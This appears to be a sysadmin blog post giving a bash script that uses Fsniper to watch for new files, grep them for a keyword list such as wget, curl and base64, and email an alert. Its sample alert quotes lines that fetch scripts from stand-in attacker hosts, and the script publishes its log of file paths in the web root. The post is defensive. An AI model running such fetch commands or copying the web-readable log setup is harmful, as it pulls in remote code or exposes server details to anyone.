Detect New Files and Send Notification if Suspicious

This post will required Fsniper installed and running on your box. Please see following post: FSniper – Monitor Newly Created Files in Directory . This is similar to popular paid-version of ConfigServer eXploit Scanner (cxs), which also using inotify functionality which comes since kernel 2.6.13.

I am using Fsniper to check and detect new files and let handler trigger following scripts. This scripts will log any new files which captured by FSniper to /var/www/html/new_files.txt (so i can browse the files using web browser by accessing http://yourwebsite.com/new_files.txt) and then notify me whenever they found any of suspicious words inside the files:
wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

#!/bin/bash
output_file='/var/www/html/new_files.txt'
user_owner=`ls -al $1 | awk '{print $3}'`
ip=`hostname -i`
subject='Found something suspicious'
emailto='youremail@domain.tld'
message=/tmp/emailmessage.txt
 
echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file
 
danger=`egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 | wc -l`
 
if [ $danger -gt 0 ]; then
echo 'Server:' $(hostname) > $message
egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 >> $message
mail -s "$ip | $subject"  "$emailto" < $message
fi

The email you will received will be similar like this:

From: root
To: youremail@domain.tld
Subject: 192.168.1.1 | Found something suspicious
Email Body:
 
Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:wget http://192.168.0.100/bad_thing.php
/home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changes files and make sure you are the first to know if the new files is containing unwanted words. You can modify the script to suit your needs.